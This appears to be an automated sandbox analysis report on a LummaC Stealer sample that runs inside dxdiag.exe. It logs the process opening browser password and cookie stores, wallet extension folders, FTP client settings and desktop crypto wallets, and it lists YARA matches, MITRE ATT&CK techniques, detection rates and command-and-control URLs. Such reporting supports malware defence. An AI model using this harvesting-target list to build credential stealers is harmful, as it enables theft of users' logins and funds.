                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\key4.dbJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\logins.jsonJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cert9.dbJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
                Source: Yara matchFile source: 00000002.00000003.1571272583.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1567861669.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1570587188.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1569901131.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1585547494.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1570198116.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1566987811.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1576883133.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1578784333.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1569019682.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1566706853.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1567162517.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1566093282.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1540180374.000000000301F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1578277745.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1583499340.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1577721314.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1568656377.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1581059278.000000000301F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1565623403.000000000301F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1566593228.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1571636824.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1574086916.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1565979094.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1568493204.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1585491290.0000000003035000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1572522073.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1567592332.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1566813341.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1568118321.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1566394877.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1571946572.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1566212267.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1570969220.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1567305786.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1574970043.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1576032432.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1566302806.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1569167137.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1585426357.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1566907407.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1569362451.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: dxdiag.exe PID: 8016, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: dxdiag.exe PID: 8016, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation                		1
                DLL Side-Loading                		311
                Process Injection                		21
                Virtualization/Sandbox Evasion                		2
                OS Credential Dumping                		1
                System Time Discovery                		Remote Services41
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		311
                Process Injection                		LSASS Memory221
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Non-Application Layer Protocol                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information                		Security Account Manager21
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive113
                Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                DLL Side-Loading                		NTDS1
                Process Discovery                		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials23
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                PI1EA8P74K.exe87%ReversingLabsWin32.Exploit.LummaC
                PI1EA8P74K.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://marbleshinys.click/kw50%Avira URL Cloudsafe
                https://marbleshinys.click/apiv0%Avira URL Cloudsafe
                https://marbleshinys.click/;v0%Avira URL Cloudsafe
                https://marbleshinys.click/3w0%Avira URL Cloudsafe
                https://marbleshinys.click/jgES0%Avira URL Cloudsafe
                https://marbleshinys.click/api0%Avira URL Cloudsafe
                https://marbleshinys.click/Kv0%Avira URL Cloudsafe
                https://marbleshinys.click/Sv=0%Avira URL Cloudsafe
